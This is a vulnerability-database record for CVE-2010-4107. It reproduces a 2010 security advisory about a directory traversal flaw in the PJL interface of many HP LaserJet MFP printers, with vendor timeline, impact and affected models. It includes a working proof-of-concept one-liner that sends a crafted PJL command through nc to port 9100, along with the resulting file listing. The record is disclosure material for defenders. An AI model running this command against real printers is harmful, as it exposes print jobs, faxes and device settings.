ID
VAR-E-201011-0053
CVE
| cve_id: | CVE-2010-4107 | Trust: 2.9 |
EDB ID
15631
TITLE
HP LaserJet - Directory Traversal in PJL Interface - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
HP LaserJet - Directory Traversal in PJL Interface. CVE-2010-4107CVE-69268 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | hp | model: | laserjet | scope: | - | version: | - | Trust: 1.0 |
| vendor: | hp | model: | laserjet pjl interface | scope: | - | version: | - | Trust: 0.5 |
| vendor: | hp | model: | jetdirect pjl interface universal | scope: | - | version: | - | Trust: 0.5 |
| vendor: | hp | model: | laserjet m9050 mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | laserjet m4345x mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | laserjet m1522n mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | laserjet mfp | scope: | eq | version: | 90500 | Trust: 0.3 |
| vendor: | hp | model: | laserjet 9000mfp | scope: | - | version: | - | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 9000 | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 8150 | Trust: 0.3 |
| vendor: | hp | model: | laserjet mfp | scope: | eq | version: | 50350 | Trust: 0.3 |
| vendor: | hp | model: | laserjet 4345mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | laserjet mfp | scope: | eq | version: | 43450 | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 4300 | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 4200 | Trust: 0.3 |
| vendor: | hp | model: | laserjet 4100mfp | scope: | - | version: | - | Trust: 0.3 |
| vendor: | hp | model: | laserjet | scope: | eq | version: | 4100 | Trust: 0.3 |
| vendor: | hp | model: | laserjet mfp | scope: | eq | version: | 30350 | Trust: 0.3 |
| vendor: | hp | model: | laserjet series | scope: | eq | version: | 5100 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet cm4730 mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet 9500mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet mfp | scope: | eq | version: | 60400 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet 4730mfp | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | hp | model: | color laserjet mfp | scope: | eq | version: | 47300 | Trust: 0.3 |
EXPLOIT
n.runs AG
http://www.nruns.com/ security(at)nruns.com
n.runs-SA-2010.003 16-Nov-2010
________________________________________________________________________
Vendor: Hewlett-Packard, http://www.hp.com
Affected Products: Various HP LaserJet MFP devices
(See HP advisory [3] for the complete list)
Vulnerability: Directory Traversal in PJL interface
Risk: HIGH
________________________________________________________________________
Vendor communication:
2009/11/25 Initial notification of Hewlett-Packard
2009/11/25 HP confirms receival of advisory
2010/02/05 n.runs AG requests update on the reported issue
2010/02/05 HP notifies n.runs AG that an advisory is in preparation
2010/11/15 Publication of HP advisory
________________________________________________________________________
Overview:
The Printer Job Language (PJL) was developed by Hewlett-Packard to
provide a method for switching printer languages at the job level
and for status exchange between the device and a host computer.
Besides the possibility to view and change parts of the printer's
configuration or modify control panel messages PJL allows some limited
form of file system access. PJL is used "above" other printer languages
such as PCL and is usually accessible on port 9100. Detailed
information about PJL can be found in the PJL Technical Reference
Manual [1].
Description:
A directory traversal vulnerability has been found in the PJL file
system access interface of various HP LaserJet MFP devices.
File system access through PJL is usually restricted to a specific
part of the file system. Using a pathname such as 0:\..\..\..\ it
is possible to get access to the complete file system of the device.
Proof of Concept:
The following command can be used to reproduce the problem. It lists
all files in the root directoy of the device:
$ python -c 'print "\x1b%-12345X () PJL FSDIRLIST NAME=\"0:\\..\\..\\..\\\" \
ENTRY=1 COUNT=999999\x0d\x0a\x1b%-12345X\x0d\x0a"' | nc 192.168.0.1 9100
@PJL FSDIRLIST NAME="0:\..\..\..\" ENTRY=1
. TYPE=DIR
.. TYPE=DIR
tmp TYPE=DIR
etc TYPE=DIR
xps TYPE=DIR
dsk_ide2a TYPE=DIR
dsk_ColorIQ TYPE=DIR
dsk_CustomIQ TYPE=DIR
bootdev TYPE=DIR
dsk_jdi TYPE=DIR
dsk_jdi_ss TYPE=DIR
dsk_af TYPE=DIR
lrt TYPE=DIR
webServer TYPE=DIR
Impact:
This vulnerability allows sensitive information to be disclosed
and potentially be modified. This includes spooled print jobs,
received faxes, log files or other settings of the device.
Solution:
See the HP advisory [3] for possible workarounds.
________________________________________________________________________
Credit:
Bug found by Moritz Jodeit of n.runs AG.
________________________________________________________________________
References:
[1]
http://h20000.www2.hp.com/bc/docs/support/SupportManual/bpl13208/bpl13208.pd
f
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4107
[3]
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c0200
4333
This Advisory and Upcoming Advisories:
http://www.nruns.com/security_advisory.php
________________________________________________________________________
Unaltered electronic reproduction of this advisory is permitted. For all
other reproduction or publication, in printing or otherwise, contact
security () nruns com for permission. Use of the advisory constitutes
acceptance for use in an "as is" condition. All warranties are excluded. In
no event shall n.runs be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages, even if n.runs has been advised of the possibility of such damages.
Copyright 2010 n.runs AG. All rights reserved. Terms of use apply.
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Directory Traversal in PJL Interface
Trust: 1.0
TAGS
| tag: | exploit | Trust: 1.0 |
| tag: | file inclusion | Trust: 0.5 |
CREDITS
n.runs AG
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2010-4107 | Trust: 3.5 |
| db: | EXPLOIT-DB | id: | 15631 | Trust: 1.6 |
| db: | EDBNET | id: | 38481 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 14994 | Trust: 0.6 |
| db: | EDBNET | id: | 14974 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 96205 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 103777 | Trust: 0.5 |
| db: | BID | id: | 44882 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2010-4107 | Trust: 2.6 |
| url: | https://www.exploit-db.com/exploits/15631/ | Trust: 0.6 |
| url: | https://0day.today/exploits/14994 | Trust: 0.6 |
| url: | http://www.nruns.com/_downloads/sa-2010%20003-hewlett-packard.pdf | Trust: 0.3 |
| url: | https://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02004333 | Trust: 0.3 |
| url: | http://www.hp.com/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 44882 |
| db: | PACKETSTORM | id: | 96205 |
| db: | PACKETSTORM | id: | 103777 |
| db: | EXPLOIT-DB | id: | 15631 |
| db: | EDBNET | id: | 38481 |
| db: | EDBNET | id: | 14974 |
LAST UPDATE DATE
2022-07-27T09:19:24.247000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 44882 | date: | 2014-05-06T01:11:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 44882 | date: | 2010-11-15T00:00:00 |
| db: | PACKETSTORM | id: | 96205 | date: | 2010-11-30T00:29:27 |
| db: | PACKETSTORM | id: | 103777 | date: | 2011-08-07T17:05:41 |
| db: | EXPLOIT-DB | id: | 15631 | date: | 2010-11-29T00:00:00 |
| db: | EDBNET | id: | 38481 | date: | 2010-11-29T00:00:00 |
| db: | EDBNET | id: | 14974 | date: | 2010-11-30T00:00:00 |